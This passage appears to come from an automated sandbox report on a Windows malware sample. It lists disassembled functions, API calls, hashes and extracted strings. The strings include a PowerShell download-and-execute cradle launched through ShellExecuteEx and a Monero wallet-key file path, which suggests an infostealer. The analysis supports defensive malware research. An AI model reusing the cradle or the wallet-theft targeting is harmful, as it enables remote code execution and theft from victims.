                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: c1bbf4fb4f0a8a89cdef0a3dbe71d5d8b089705e6b0663f71b5ddaadfc43a708
                  • Instruction ID: be05ee93d8a94c722bc6773110b992d093698e7882180927b8ab200ae81ad430
                  • Opcode Fuzzy Hash: c1bbf4fb4f0a8a89cdef0a3dbe71d5d8b089705e6b0663f71b5ddaadfc43a708
                  • Instruction Fuzzy Hash: B7313C74A0020DEFDB14DFA4C895BAEB7B5FF48305F148258E905A7290D774A981DFB2
                  Function 00D4C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Typememset
                  • String ID:
                  • API String ID: 3530896902-3916222277
                  • Opcode ID: 74d4e9b19bb150b85e7658e88690bb889d9a80235ebd71d66595e01b53cbf74e
                  • Instruction ID: 1830182082e0a2632a38659c4f96f47bf2ccabbdc39f95fb5b10fabe7bfcb2e4
                  • Opcode Fuzzy Hash: 74d4e9b19bb150b85e7658e88690bb889d9a80235ebd71d66595e01b53cbf74e
                  • Instruction Fuzzy Hash: DD41077111179CAFDB218B24CC84FFBBBE99F45705F1854E8E9CA86182E2719A45CF30
                  Function 00D44780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrcat.KERNEL32(?,00AFE320), ref: 00D447DB
                    • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00D44801
                  • lstrcat.KERNEL32(?,?), ref: 00D44820
                  • lstrcat.KERNEL32(?,?), ref: 00D44834
                  • lstrcat.KERNEL32(?,00AEB7E8), ref: 00D44847
                  • lstrcat.KERNEL32(?,?), ref: 00D4485B
                  • lstrcat.KERNEL32(?,00AFDB60), ref: 00D4486F
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D48D90: GetFileAttributesA.KERNEL32(00000000,?,00D31B54,?,?,00D5564C,?,?,00D50E1F), ref: 00D48D9F
                    • Part of subcall function 00D44570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D44580
                    • Part of subcall function 00D44570: RtlAllocateHeap.NTDLL(00000000), ref: 00D44587
                    • Part of subcall function 00D44570: wsprintfA.USER32 ref: 00D445A6
                    • Part of subcall function 00D44570: FindFirstFileA.KERNEL32(?,?), ref: 00D445BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: fa0c21dca2792c8089cc7541b335d8ae4b680f8649a7830b40f09637ec973265
                  • Instruction ID: cbdca2e526c23221ac579e98c5fd5e19b95147cbfaace7e5a6be44092c5b7088
                  • Opcode Fuzzy Hash: fa0c21dca2792c8089cc7541b335d8ae4b680f8649a7830b40f09637ec973265
                  • Instruction Fuzzy Hash: E5313EB694021CABCB14FBA0DC85EED7378AB98700F404589B35996081EE7496C9DFB6
                  Function 00D42C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00D42D85
                  Strings
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00D42CC4
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00D42D04
                  • <, xrefs: 00D42D39
                  • ')", xrefs: 00D42CB3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 4be129be25f13c3852b033398364797d2033d1be61a78656fdfb82cc139fb60b
                  • Instruction ID: 76a403fec2088b30f03c214b8685a66899c9ec4ce88e5532f81a417a58e24f91
                  • Opcode Fuzzy Hash: 4be129be25f13c3852b033398364797d2033d1be61a78656fdfb82cc139fb60b
                  • Instruction Fuzzy Hash: 7241AA71C502189BEB14EBA4C892BEDBB78EF14304F504119F516A7192EF746A4ACFB2
                  Function 00D39E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                  Download Yara Rule
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00D39F41
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 8dfd1ab80e0b8261323c082318c1e4101fc0798c23002ad08a0ca4e977050a14
                  • Instruction ID: b4b56dae56f75f994cb39c6fe9078af753c02b20cfb4e65431284d58ca5bd47a
                  • Opcode Fuzzy Hash: 8dfd1ab80e0b8261323c082318c1e4101fc0798c23002ad08a0ca4e977050a14
                  • Instruction Fuzzy Hash: FA612F75A50248AFDB28EFA8CC96FED7775EF44304F008018F90A5B195EB746A09CB72
                  Function 00D46920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 00D4696C
                  • sscanf.NTDLL ref: 00D46999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D469B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D469C0
                  • ExitProcess.KERNEL32 ref: 00D469DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: e5f1286be4eeeac802f26d9a9dd0655b6998e43d7a396e129cfca5319dd328c9
                  • Instruction ID: c362a15fb8cab86a497a5ea3b8dd9283ffed275551dd6f365caa3312409891c6
                  • Opcode Fuzzy Hash: e5f1286be4eeeac802f26d9a9dd0655b6998e43d7a396e129cfca5319dd328c9
                  • Instruction Fuzzy Hash: 7121BA75D1420CABCF04EFE8E9459EEB7B5FF48300F04852AE41AA3250EB749645DB66
                  Function 00D47E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D47E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,00AEC010,00000000,00020119,?), ref: 00D47E5E
                  • RegQueryValueExA.ADVAPI32(?,00AFDD60,00000000,00000000,000000FF,000000FF), ref: 00D47E7F
                  • RegCloseKey.ADVAPI32(?), ref: 00D47E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: caa41c43f4dbb1aaea3dce848c0348d0078d81c9383eaa56b55aaf687f4829ce
                  • Instruction ID: 8db298208410da85f1af5db1dc7e038a3dfafeaada69439b69b4d8b6882efeda
                  • Opcode Fuzzy Hash: caa41c43f4dbb1aaea3dce848c0348d0078d81c9383eaa56b55aaf687f4829ce
                  • Instruction Fuzzy Hash: D31191B1A44209EBD704CF94DC49FBFBBB8EB44701F104269FA19A7280D77458009BB2
                  Function 00D49260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrA.SHLWAPI(00AFDED0,?,?,?,00D4140C,?,00AFDED0,00000000), ref: 00D4926C
                  • lstrcpyn.KERNEL32(00F7AB88,00AFDED0,00AFDED0,?,00D4140C,?,00AFDED0), ref: 00D49290
                  • lstrlen.KERNEL32(?,?,00D4140C,?,00AFDED0), ref: 00D492A7
                  • wsprintfA.USER32 ref: 00D492C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: 6213edee1f0e4e9a71eb97b2dc816c4d7381815e42be341e39e70885bca387df
                  • Instruction ID: bd621b90faaab6e2a49f72188de5a4307ad749fdf73b48cf2b1533522225b596
                  • Opcode Fuzzy Hash: 6213edee1f0e4e9a71eb97b2dc816c4d7381815e42be341e39e70885bca387df
                  • Instruction Fuzzy Hash: 5701E97550010CFFCB04DFECC994EAE7BB9EB84351F118188F9098B201C671AA50EBA2
                  Function 00D312A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D312B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D312BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00D312D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00D312F5
                  • RegCloseKey.ADVAPI32(?), ref: 00D312FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 1ec3c674cf6d7e5cfd72ab8a12863bd5356a7d04b8175aaf380712dbc6a5cffa
                  • Instruction ID: 8d393aeefcad8b54cfaff967a2e5df8a4739ea223602a029ee273b1eff2ae1b5
                  • Opcode Fuzzy Hash: 1ec3c674cf6d7e5cfd72ab8a12863bd5356a7d04b8175aaf380712dbc6a5cffa
                  • Instruction Fuzzy Hash: 8E01E1B9A4020DBBDB04DFE4DC49FAEB7B8EB88701F108159FA0997280D6759A419F52
                  Function 00D46630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00D46663
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00D46726
                  • ExitProcess.KERNEL32 ref: 00D46755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 0fe456ca2b449961d4d16b66e97028195031b05e726f8f2037db438b4137bfdf
                  • Instruction ID: dacd898773cd9186cf43087a30bfd6579d8a87000d8e108e99bd1adf535b8d16
                  • Opcode Fuzzy Hash: 0fe456ca2b449961d4d16b66e97028195031b05e726f8f2037db438b4137bfdf
                  • Instruction Fuzzy Hash: 38310CB1841218ABEB14EBA4DC96FDEB778EF44300F404199F20966191DF746B89CF76
                  Function 00D487C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00D50E28,00000000,?), ref: 00D4882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D48836
                  • wsprintfA.USER32 ref: 00D48850
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
